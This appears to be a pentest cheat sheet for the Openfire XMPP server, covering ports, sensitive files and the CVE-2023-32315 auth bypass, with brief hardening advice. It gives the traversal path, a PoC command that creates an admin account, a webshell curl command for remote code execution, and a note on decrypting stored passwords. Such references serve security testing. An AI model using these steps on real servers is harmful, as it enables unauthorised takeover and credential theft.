Openfire (XMPP)
aka xmpp, jabber
Ignite Realtime's XMPP/Jabber server. Admin console on 9090/9091; a 2023 path-traversal auth bypass (CVE-2023-32315) lets you create an admin and upload a malicious plugin for RCE.
Ports
| Port | Proto | Notes |
|---|---|---|
9090 | tcp | Admin console (HTTP) |
9091 | tcp | Admin console (HTTPS) |
5222 | tcp | XMPP client-to-server |
7070 | tcp | HTTP-bind (BOSH) |
Fingerprint
- Admin console login at /login.jsp, 'Openfire' branding + version
- XMPP banner on 5222
Key files
| Path | Holds | Sensitive |
|---|---|---|
/opt/openfire/conf/openfire.xml | DB connection, admin console settings | sensitive |
embedded-db/openfire.script | HSQLDB: admin hash / encrypted passwords | sensitive |
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2023-32315 | Path-traversal auth bypass to the admin console → plugin upload RCE |
Exploitation primitives
- CVE-2023-32315: reach setup/admin pages via /setup/setup-s/..%c0%af.. traversal, add a new admin user
- As admin, upload a malicious .jar plugin (openfire-management-tool) for a webshell / RCE as the openfire user
- Decrypt stored XMPP user passwords from the embedded DB using the AES key in openfire.xml
Overview
Openfire is a Java XMPP/Jabber server. The admin console on 9090/9091 is the way in: CVE-2023-32315 bypasses authentication via path traversal, after which a malicious plugin gives code execution.
Auth bypass → admin (CVE-2023-32315)
Use the PoC to create a new admin account through the traversal:
python3 CVE-2023-32315.py -t http://<TARGET>:9090It registers a throwaway admin (e.g. username3036:Pass@123) you can log into at /login.jsp.
Plugin RCE
Once logged in as admin, upload the weaponised management plugin under Plugins → Upload Plugin, then browse to it for a shell:
curl "http://<TARGET>:9090/plugins/openfire-management-tool-plugin/cmd.jsp?cmd=id&pass=123"Hardening
Patch to ≥ 4.7.5 / 4.6.8, restrict the admin console to trusted networks, and rotate any XMPP passwords stored in the embedded DB.